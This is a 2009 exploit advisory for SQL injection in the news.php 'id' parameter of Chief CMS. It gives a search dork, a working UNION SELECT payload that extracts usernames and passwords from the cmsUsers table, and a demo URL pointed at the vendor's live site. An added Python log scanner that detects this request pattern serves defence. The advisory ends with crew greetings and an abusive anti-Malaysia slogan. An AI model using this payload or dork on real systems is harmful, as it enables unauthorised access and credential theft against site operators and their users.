
Author: kaMtiEz   Title: Chief CMS SQL injection   Views: 12639

kamzcrew@yahoo.com
http://www.indonesiancoder.com

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################

[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]

[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--
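
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web-server access logs for `news.php` requests whose `id` value is not a plain positive integer and labels the ones carrying the `union ... select` form. The log lines are constructed, and the combined log format and the integer-only `id` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [15/Sep/2009:08:40:01 +0700] "GET /news.php?id=12 HTTP/1.1" 200 5120
198.51.100.7 - - [15/Sep/2009:08:40:09 +0700] "GET /news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers-- HTTP/1.1" 200 5344
203.0.113.20 - - [15/Sep/2009:08:41:30 +0700] "GET /news.php?id=-1%20UNION%20SELECT%201%2C2%20FROM%20cmsUsers HTTP/1.1" 200 5300
203.0.113.20 - - [15/Sep/2009:08:42:02 +0700] "GET /index.php?page=2 HTTP/1.1" 200 900
203.0.113.9 - - [15/Sep/2009:08:43:11 +0700] "GET /news.php?id=abc HTTP/1.1" 200 310
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)
VALID_ID = re.compile(r"[0-9]{1,10}")  # assumption: article ids are positive integers

def classify_id(value):
    """Label a decoded id value: 'ok', 'union-select' or 'non-integer'."""
    if VALID_ID.fullmatch(value):
        return "ok"
    if UNION_RE.search(value):
        return "union-select"
    return "non-integer"

def scan(log_text, script="/news.php", param="id"):
    """Return (client, status, verdict, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs decodes both '+' and %xx, so encoded variants compare equal.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, status, verdict, value))
    return findings

if __name__ == "__main__":
    for client, status, verdict, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} {verdict}: {value!r}")
```

The same strict integer test is what the application should apply to `id` before it reaches a query, alongside a parameterized statement.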

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is my birthday, I am 18 !!


[ QUOTE ]

"This is my chest, where is yours?

If Malaysia wants an economic confrontation, let us face it with economic confrontation
If Malaysia wants a political confrontation, let us face it with political confrontation
If Malaysia wants a military confrontation, let us face it with military confrontation

Soekarno, 1963"

Soekarno : I hereby declare "GANYANG MALAYSIA" ("Crush Malaysia")

FUCK MALAYSIA !!!

Related posts: none   Posted: 2009/09/15 8:41 from 125.161.199.92
